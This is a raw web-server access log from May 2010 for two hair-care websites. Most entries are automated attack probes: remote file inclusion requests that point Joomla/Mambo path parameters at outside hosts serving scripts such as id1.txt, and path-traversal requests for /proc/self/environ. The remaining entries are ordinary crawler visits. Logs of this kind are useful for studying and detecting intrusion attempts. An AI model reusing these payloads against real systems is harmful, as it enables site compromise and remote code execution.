207.45.185.178 - - [03/May/2010:09:22:30 -0700] "GET /logs/?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:09:23:13 -0700] "GET /logs/access_100412.log/?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:09:23:13 -0700] "GET /logs/?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:09:23:13 -0700] "GET /?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:09:23:31 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
207.45.185.178 - - [03/May/2010:09:23:31 -0700] "GET /?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
207.45.185.178 - - [03/May/2010:09:23:31 -0700] "GET /logs/?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "www.freehairsecrets.com"
207.45.185.178 - - [03/May/2010:09:24:51 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:09:24:51 -0700] "GET /logs/?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:09:24:51 -0700] "GET /?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
87.117.228.42 - - [03/May/2010:09:34:22 -0700] "GET /logs/access_100412.log/errors.php?error=http://mogsoft.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.117.228.42 - - [03/May/2010:09:34:22 -0700] "GET /logs/errors.php?error=http://mogsoft.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.117.228.42 - - [03/May/2010:09:34:22 -0700] "GET /errors.php?error=http://mogsoft.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.117.228.42 - - [03/May/2010:09:34:22 -0700] "GET /logs/access_100426.log/errors.php?error=http://mogsoft.com/tmp/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
119.235.237.17 - - [03/May/2010:09:35:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13629 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:09:35:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14625 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.212.226.153 - - [03/May/2010:09:36:00 -0700] "GET /logs/access_091123.log HTTP/1.0" 200 1294739 "http://growlonghairfast.com/logs/access_091123.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "growlonghairfast.com"
119.235.237.20 - - [03/May/2010:09:37:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12296 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:42:23 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:23 -0700] "GET /logs/access_100412.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:23 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:28 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:28 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:28 -0700] "GET /logs/access_100412.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:28 -0700] "GET /logs/access_100412.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:29 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:29 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:32 -0700] "GET /logs/access_100412.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:32 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:33 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:42 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:42 -0700] "GET /logs/access_100412.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:42:42 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.191.40.17 - - [03/May/2010:09:44:15 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "growlonghairfast.com"
195.191.40.17 - - [03/May/2010:09:44:15 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:49:56 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:49:56 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:49:56 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:49:58 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:49:58 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:49:59 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:50:07 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:50:07 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:50:07 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:51:06 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:51:06 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:51:06 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:51:23 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:51:24 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:51:24 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:51:24 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:51:24 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:51:24 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:51:48 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:51:50 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.67.201.187 - - [03/May/2010:09:51:51 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.80.122.44 - - [03/May/2010:09:52:23 -0700] "GET /logs/access_091123.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.80.122.44 - - [03/May/2010:09:52:24 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.80.122.44 - - [03/May/2010:09:52:24 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:52:48 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:52:48 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.67.201.187 - - [03/May/2010:09:52:48 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.96.90.170 - - [03/May/2010:09:58:04 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
82.96.90.170 - - [03/May/2010:09:58:04 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
82.96.90.170 - - [03/May/2010:09:58:08 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
82.96.90.170 - - [03/May/2010:09:58:08 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.191.40.17 - - [03/May/2010:09:59:42 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "freehairsecrets.com"
195.191.40.17 - - [03/May/2010:09:59:46 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "freehairsecrets.com"
91.201.66.83 - - [03/May/2010:10:10:10 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.201.66.83 - - [03/May/2010:10:10:10 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322)" "growlonghairfast.com"
209.59.164.98 - - [03/May/2010:10:16:02 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.59.164.98 - - [03/May/2010:10:16:02 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.59.164.98 - - [03/May/2010:10:16:05 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.farmacialidercba.com.ar/admin/webalizer/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:10:18:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12844 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
82.96.90.170 - - [03/May/2010:10:19:33 -0700] "GET /logs/access_100125.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
82.96.90.170 - - [03/May/2010:10:19:34 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
82.96.90.170 - - [03/May/2010:10:19:34 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
82.96.90.170 - - [03/May/2010:10:19:35 -0700] "GET /logs/access_100125.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
82.96.90.170 - - [03/May/2010:10:19:36 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
82.96.90.170 - - [03/May/2010:10:19:36 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
82.96.90.170 - - [03/May/2010:10:19:39 -0700] "GET /logs/access.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
82.96.90.170 - - [03/May/2010:10:19:39 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
82.96.90.170 - - [03/May/2010:10:19:39 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
82.96.90.170 - - [03/May/2010:10:19:40 -0700] "GET /logs/access.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
82.96.90.170 - - [03/May/2010:10:19:40 -0700] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
82.96.90.170 - - [03/May/2010:10:19:40 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
207.45.185.178 - - [03/May/2010:10:20:01 -0700] "GET /logs/access_100412.log%20%20/?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:10:20:01 -0700] "GET /?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:10:20:01 -0700] "GET /logs/?mosConfig_absolute_path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [03/May/2010:10:21:23 -0700] "GET /download.php?board_skin_path=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [03/May/2010:10:21:23 -0700] "GET /logs/access_100215.log%20%20/download.php?board_skin_path=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [03/May/2010:10:21:23 -0700] "GET /logs/download.php?board_skin_path=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [03/May/2010:10:23:03 -0700] "GET /logs/download.php?board_skin_path=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [03/May/2010:10:23:03 -0700] "GET /logs/access_100215.log%20%20/download.php?board_skin_path=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [03/May/2010:10:23:03 -0700] "GET /download.php?board_skin_path=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:10:27:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14689 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.249.65.107 - - [03/May/2010:10:29:54 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
184.73.59.247 - - [03/May/2010:10:34:28 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "www.freehairsecrets.com"
184.73.59.247 - - [03/May/2010:10:34:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13522 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "www.freehairsecrets.com"
121.78.118.123 - - [03/May/2010:10:36:31 -0700] "GET /logs/access_100426.log/download.php?board_skin_path=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:10:37:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15371 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
121.78.118.123 - - [03/May/2010:10:37:12 -0700] "GET /logs/access_100426.log/download.php?board_skin_path=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.237.86 - - [03/May/2010:10:40:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18916 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
119.235.237.93 - - [03/May/2010:10:42:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12211 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:10:45:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13181 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
216.150.224.151 - - [03/May/2010:10:45:42 -0700] "GET /logs/access_091228.log//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:45:42 -0700] "GET /index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:45:42 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:45:55 -0700] "GET /logs/access_091221.log//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:46:07 -0700] "GET /index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:46:07 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:46:07 -0700] "GET /logs/access_091228.log//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:10:46:24 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:10:46:24 -0700] "GET /logs/access_091228.log//index.php?mosConfig.absolute.path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.45.185.178 - - [03/May/2010:10:46:24 -0700] "GET /index.php?mosConfig.absolute.path=http://enniskillengaa.com//id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:46:24 -0700] "GET /logs/access_091221.log//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:46:31 -0700] "GET /index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:46:31 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.150.224.151 - - [03/May/2010:10:46:31 -0700] "GET /logs/access_091228.log//index.php?mosConfig.absolute.path=http://www.thetravelgig.com/administrator/components/com_templates/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
